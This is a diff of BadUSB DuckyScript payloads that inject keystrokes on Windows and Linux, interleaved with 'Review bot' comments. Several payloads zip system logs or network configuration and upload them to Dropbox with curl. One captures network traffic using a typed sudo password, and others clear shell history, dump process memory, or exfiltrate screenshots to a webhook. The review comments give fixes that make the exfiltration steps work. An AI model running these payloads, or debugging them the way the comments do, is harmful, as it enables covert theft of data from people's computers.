REM_BLOCK
###################################
# #
# Title : Set Tor Bridge #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
###################################
END_REM
REM Requirements:
REM - Tor installed


@ -1,17 +1,61 @@
REM ####################################################################################
REM # |
REM # Title : Starting a PowerShell with administrator permissions in Windows |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM ####################################################################################
REM_BLOCK
####################################################################################
# #
# Title : Starting a PowerShell with administrator permissions in Windows #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10-11 #
# #
####################################################################################
END_REM
REM Requirements:
REM - Nothing
DELAY 1000
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI x
DELAY 500
STRING a
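Review bot: `REM Requirements:` / `REM - Nothing` undersells what this payload needs. `GUI x` then `a` picks the elevated shell entry from the Win+X menu, which raises a UAC consent or credential prompt, so the logged-on account must be a local administrator (or an administrator password must be supplied) for anything after `STRING a` to run; state that as a requirement. Since the header says `Target : Windows 10-11`, also note that on Windows 11 with Windows Terminal set as the default console the same menu entry opens Terminal (Admin) rather than a standalone Windows PowerShell window, so the follow-up keystrokes should be tested there as well.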


@ -1,28 +1,68 @@
REM #####################################################
REM # |
REM # Title : Stop A Single Process In Windows |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM #####################################################
REM_BLOCK
#####################################################
# #
# Title : Stop A Single Process In Windows #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
#####################################################
END_REM
REM Requirements:
REM - Nothing
REM Write the name of the process that you want to stop
DEFINE PROCESS_NAME example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Task Manager
GUI
DELAY 1000
STRING Task Manager
ENTER
STRINGLN Task Manager
DELAY 1000
REM Goto search bar
@ -36,9 +76,7 @@ TAB
DELAY 500
REM Write the process name
STRING PROCESS_NAME
DELAY 500
ENTER
STRINGLN PROCESS_NAME
DELAY 500
TAB
DELAY 500
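Review bot: `DEFINE PROCESS_NAME example` and its use in `STRINGLN PROCESS_NAME` keep the bare constant name while the other payloads in this change moved to `#`-prefixed constants; rename to `#PROCESS_NAME` so the token cannot be substituted into unrelated typed text. Separately, `STRINGLN Task Manager` relies on the English display name of the app, so the search step fails on a localised Windows; either add the `Payload tested on Windows 11 Eng` note that the "Make Windows performant" payload carries, or launch it language-independently with `GUI r` and `STRINGLN taskmgr`.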


@ -1,12 +1,14 @@
REM #######################################################
REM # |
REM # Title : Telegram Persistent Connection Linux |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM #######################################################
REM_BLOCK
#######################################################
# #
# Title : Telegram Persistent Connection Linux #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Linux #
# #
#######################################################
END_REM
REM Requirements:
REM - Internet Connection
@ -14,7 +16,34 @@ REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
DELAY 1000
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000
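Review bot: the pasted extension documentation states `Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms`; that figure is not a constant but `#ITERATION_LIMIT` times `#RESPONSE_DELAY` (120 x 25 ms), so if either value is tuned for a slow Linux host the comment silently goes stale. Phrase it in terms of the two constants. The same 1.1 extension body is now pasted into every Linux payload of this change without a source reference, while the Windows one in "Replace Links In GithubDesktop" carries a `Credits: Hak5 LLC` / `Source:` block; add the same block here so each copy can be traced to the upstream version when that is updated.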


@ -1,12 +1,14 @@
REM #####################################
REM # |
REM # Title : Uninstall Signal |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM #####################################
REM_BLOCK
#####################################
# #
# Title : Uninstall Signal #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10-11 #
# #
#####################################
END_REM
REM Plug-And-Play <3
@ -14,11 +16,52 @@ REM Requirements:
REM - Signal App installed
REM - ExecutionPolicy Bypass
DELAY 2000
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRING powershell
ENTER
STRINGLN powershell
DELAY 2000
STRINGLN Stop-Process -Name "Signal"
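Review bot: the requirement `REM - ExecutionPolicy Bypass` does not match what the payload does. It launches an interactive `powershell` window and types `Stop-Process -Name "Signal"` at the prompt; execution policy governs script files, not commands typed interactively, so either the requirement is stale or the launch line was meant to be `powershell -ExecutionPolicy Bypass` for a script step that follows. Also, `Stop-Process -Name "Signal"` prints an error when Signal is not running; harmless in an interactive session, but `-ErrorAction SilentlyContinue` keeps the console predictable for the commands typed after it.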


@ -36,17 +36,11 @@ In addition to legal implications, **unauthorized removal of an application can
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
</a>
<br>Instagram
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Discord
<br>Linkedin
</td>
</tr>
</table>


@ -1,12 +1,14 @@
REM ##############################################################################
REM # |
REM # Title : Uninstall A Specific App On Windows Through Control Panel |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM ##############################################################################
REM_BLOCK
##############################################################################
# #
# Title : Uninstall A Specific App On Windows Through Control Panel #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
##############################################################################
END_REM
REM Requirements:
REM - The application you want to uninstall must be installed on the target (?obvious right? ^^)
@ -17,15 +19,55 @@ REM - Payload tested on Windows 11 Eng
REM Set the exact name of the application as it appears within the control panel. Do not assume that just because an application is known by a certain name then it will have exactly that name, e.g. `Firefox` shows up again as `Mozilla Firefox (x64 en)`
DEFINE #APP_NAME example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Windows research
DELAY 2000
GUI
DELAY 1000
REM Search and opern explorer app
STRING explorer
ENTER
STRINGLN explorer
DELAY 1000
REM Goto search bar and open "Uninstall or change a program" page
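Review bot: comment wording in the added lines: `REM Open Windows research` should read "Open Windows search", and `REM Search and opern explorer app` has a typo ("open"). The long `DEFINE #APP_NAME` comment two lines earlier is one unbroken sentence; splitting it over two or three `REM` lines (the rule, then the `Mozilla Firefox (x64 en)` example) would make the requirement easier to spot.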


@ -1,18 +1,18 @@
REM ########################################################
REM # #
REM # Title : Dump Windows Memory Through ProcDump #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Exfiltration #
REM # Target : Windows #
REM # #
REM ########################################################
REM_BLOCK
########################################################
# #
# Title : Dump Windows Memory Through ProcDump #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Windows #
# #
########################################################
END_REM
REM Requirements:
REM - Authorization to execute powershell commands
REM You must change it to 'procdump' if you want to use procdump.exe instead of procdump64a.exe
DEFINE #WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a


@ -1,13 +1,12 @@
REM ###################################################
REM # |
REM # Title : Exfiltrate Computer Screenshots |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltrate |
REM # Target : Windows 10-11 |
REM # |
REM ###################################################
###################################################
# #
# Title : Exfiltrate Computer Screenshots #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltrate #
# Target : Windows 10-11 #
# #
###################################################
REM Requirements:
REM - Internet Connection
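Review bot: this header conversion is incomplete and the file will not compile. The nine `REM #...` lines were replaced by bare `###...` / `# Title : ...` lines, but unlike every other payload in this change they are not wrapped in `REM_BLOCK` / `END_REM`: no wrapper lines appear in the hunk, and the count goes from 13 to 12 lines where the other headers grow by two. Without the wrapper the first line of the payload is a row of `#`, which is not a DuckyScript command. Add `REM_BLOCK` before the box and `END_REM` after it. While here, `Category : Exfiltrate` is the only payload using that label; the others say `Exfiltration`.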
@ -15,12 +14,53 @@ REM - Discord Webhook (or whatever you want for the exfiltration)
REM - ExecutionPolicy Bypass
REM - Python
REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com
DELAY 1000
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRING powershell
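Review bot: `DEFINE SCRIPT-PY-LINK example.com` keeps the old bare constant while the Linux payloads in this same change use `#PYTHON-SCRIPT-LINK` with a full `https://www.example.com/connection.py` placeholder; align the name (`#SCRIPT-PY-LINK`, or the same `#PYTHON-SCRIPT-LINK`) and give the placeholder a scheme and a file name so the download step receives a URL rather than a host name. The requirement list above it also says `REM - Python`, so the README for this payload should say which interpreter is expected on the target.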


@ -1,11 +1,9 @@
# Exfiltrate Linux Content With Dropbox - BADUSB ✅
# Exfiltrate Linux Content With Dropbox
A script used to take folder content on Linux Systems.
**Category**: Exfiltration, Execution
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
## Description
A script used to take folder content on Linux Systems.
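Review bot: the one-line description `A script used to take folder content on Linux Systems.` appears twice in the file, directly under the title and again under `## Description`; keep one. The `[![Hits](https://hits.seeyoufarm.com/...)]` badge is a third-party view counter that sends a request to `hits.seeyoufarm.com` every time the README is rendered, and its URL parameter points at the `my-flipper-shits` repository rather than this one; if this hunk is not already removing it, it should.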


@ -1,12 +1,10 @@
# Exfiltrate Linux Log Files - BADUSB ✅
# Exfiltrate Linux Log Files
A script used to take linux logs.
**Category**: Exfiltration, Execution
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
## Description
A script used to take linux logs.
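Review bot: same badge issue as the Dropbox README: the Hits counter is keyed to and links to `aleff-github/my-flipper-shits` rather than this repository. The description sentence is duplicated under the heading and under `## Description`, and `linux` should be capitalised as `Linux` in both.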

View File

@ -1,80 +1,93 @@
REM ######################################################
REM # |
REM # Title : Exfiltrate Linux Logs With Dropbox |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration, Execution |
REM # Target : Linux |
REM # |
REM ######################################################
REM_BLOCK
######################################################
# #
# Title : Exfiltrate Linux Logs With Dropbox #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration, Execution #
# Target : Linux #
# #
######################################################
END_REM
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
DELAY 1000
CTRL-ALT t
REM Required: Set here your Dropbox access TOKEN
DELAY 2000
DEFINE TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
DEFINE #TOKEN example
REM Send to Dropbox function
DEFINE #DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000
STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
STRING USER_NAME=$(whoami)
ENTER
STRINGLN USER_NAME=$(whoami)
REM Create random num
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
REM Folder path
DELAY 500
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
ENTER
STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
REM Zip path
DELAY 500
STRING ZIP_NAME="$RANDOM.zip"
ENTER
STRINGLN ZIP_NAME="$RANDOM.zip"
DELAY 500
STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
ENTER
STRINGLN ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
REM Default log path
DELAY 500
STRING LOG_PATH="/var/log/"
ENTER
STRINGLN LOG_PATH="/var/log/"
DELAY 500
STRING zip -r "$ZIP_PATH" "$LOG_PATH"
ENTER
STRINGLN zip -r "$ZIP_PATH" "$LOG_PATH"
REM Delay of zipping operation - it depends
DELAY 10000
DELAY 500
STRING DROPBOX_FOLDER="/$ZIP_NAME"
ENTER
STRINGLN DROPBOX_FOLDER="/$ZIP_NAME"
REM Send to Dropbox function
DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
DELAY 500
STRING curl -X POST
STRING DROPBOX_API_LINK
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
STRINGLN curl -X POST #DROPBOX_API_LINK --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
REM Send timing - it depends
DELAY 5000
DELAY 500
STRING rm -rf "$TMP_FOLDER_PATH"
ENTER
STRINGLN rm -rf "$TMP_FOLDER_PATH"
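Review bot: `mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX` only succeeds if `~/tmp` already exists, which it does not on a default install; when it fails `TMP_FOLDER_PATH` is empty, `ZIP_PATH` becomes `/$ZIP_NAME`, and the `zip`, `curl` and `rm -rf "$TMP_FOLDER_PATH"` lines that follow all operate on the wrong paths. Use plain `mktemp -d` (which falls back to `$TMPDIR` or `/tmp`) or `mktemp -d -p "$HOME"`; `$HOME` also removes the need for `USER_NAME=$(whoami)` and the hard-coded `/home/` prefix.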

View File

@ -1,5 +1,5 @@
# Exfiltrate Network Configuration - Linux
# Exfiltrate Network Configuration - Linux
A script used to exfiltrate the network configuration on a Linux machine.

View File

@ -1,96 +1,101 @@
REM ##########################################################
REM # |
REM # Title : Exfiltrate Linux Network Configuration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration, Execution |
REM # Target : Linux |
REM # |
REM ##########################################################
REM_BLOCK
##########################################################
# #
# Title : Exfiltrate Linux Network Configuration #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration, Execution #
# Target : Linux #
# #
##########################################################
END_REM
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
DELAY 1000
CTRL-ALT t
DELAY 2000
REM Required: Set here your Dropbox access TOKEN
DEFINE TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
DEFINE #TOKEN example
REM DELAY 500
REM STRING USER_NAME=$(whoami)
REM ENTER
REM Set yout Dropbox folder name
DEFINE #DROPBOX_FOLDER_NAME example
REM This is just a Dropbox const, don't edit
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000
STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
STRINGLN USER_NAME=$(whoami)
DELAY 500
STRING ZIP_NAME="$RANDOM.zip"
ENTER
STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
DELAY 500
STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
ENTER
STRINGLN ZIP_NAME="$RANDOM.zip"
DELAY 500
STRINGLN ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
REM Folder path
DELAY 500
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
ENTER
STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
DELAY 500
STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
ENTER
STRINGLN nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
DELAY 1000
STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
ENTER
STRINGLN nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
DELAY 1000
STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
ENTER
STRINGLN nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
DELAY 1000
REM Delay for zipping operation, it depends by computer power and folder directory
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
DELAY 3000
REM Set yout Dropbox folder name
DEFINE DROPBOX_FOLDER_NAME example
STRING DROPBOX_FOLDER="/
ENTER
STRING DROPBOX_FOLDER_NAME
ENTER
STRING "
ENTER
STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
DELAY 500
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
STRINGLN curl -X POST#DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
DELAY 2000
STRING history -c
ENTER
STRINGLN history -c
DELAY 500
STRING rm -rf "$TMP_FOLDER_PATH"
ENTER
STRINGLN rm -rf "$TMP_FOLDER_PATH"
DELAY 500
STRING rm -rf "$ZIP_PATH"
ENTER
DELAY 500
STRING exit
ENTER
STRINGLN rm -rf "$ZIP_PATH"; exit
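Review bot: two of the typed lines in this hunk do not run as intended. `STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"` (unchanged context) has no ENTER and is not a STRINGLN, so the next `STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"` is appended to the same shell line: `zip` receives `DROPBOX_FOLDER="/example"` as an extra file argument and `DROPBOX_FOLDER` is never assigned, so the later `Dropbox-API-Arg` path is just `"/"`. And the new `STRINGLN curl -X POST#DROPBOX_API_CONST --header ...` lacks the space between `POST` and the constant, unlike the same line in the Logs payload (`curl -X POST #DROPBOX_API_LINK --header ...`); whether the compiler substitutes the fused token or types it literally, curl never receives a valid method and URL. Change the zip line to STRINGLN and add the space. Minor: `REM Set yout Dropbox folder name` should read `your`.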

View File

@ -1,57 +1,76 @@
REM #############################################
REM # |
REM # Title : Exfiltrate Network Traffic |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM #############################################
REM_BLOCK
#############################################
# #
# Title : Exfiltrate Network Traffic #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Linux #
# #
#############################################
END_REM
REM Requirements:
REM - Permissions
REM - Internet Connection
REM REQUIRED: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
DEFINE #SUDO_PASS example
REM REQUIRED: Set what you want to sniff, for example tcp port 80
DEFINE SNIFFING example
DEFINE #SNIFFING example
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file
DEFINE TOKEN example
DEFINE #TOKEN example
REM Just a Dropbox const
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
REM Output file path packets.pcap, remember to use pcap extension
DEFINE FILE example.pcap
DEFINE #FILE example.pcap
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
STRINGLN sudo su
DELAY 1000
STRINGLN SUDO_PASS
STRINGLN #SUDO_PASS
DELAY 1000
REM #### Network Traffic SECTION ####
STRING FILE_PATH="
STRING FILE
STRING "
ENTER
STRINGLN FILE_PATH="#FILE"
DELAY 500
STRING filter_expression="
STRING SNIFFING
STRING "
ENTER
STRINGLN filter_expression="#SNIFFING"
DELAY 500
REM Network card name
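Review bot: the configuration comments do not match the constants they describe. `REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file` precedes `DEFINE #TOKEN example`, but the value is later typed as `ACCESS_TOKEN="#TOKEN"` and sent as a Bearer token, not a link. `REM Output file path packets.pcap` precedes `DEFINE #FILE example.pcap`, so the named default and the actual default differ. The Requirements block lists only `Permissions` and `Internet Connection`; the Dropbox account and access token that the exfiltration section depends on should be listed, as the other payloads do.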
@ -71,28 +90,18 @@ DELAY 60000
REM Kill the process by PID
STRINGLN kill $tcpdump_pid
REM #### Exfiltrate SECTION ####
REM You can use whatever you want, i use Dropbox
STRING ACCESS_TOKEN="
STRING TOKEN
